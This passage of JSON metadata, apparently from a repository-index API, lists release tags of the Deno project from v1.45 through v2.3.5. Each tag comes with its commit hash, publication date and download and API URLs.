.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-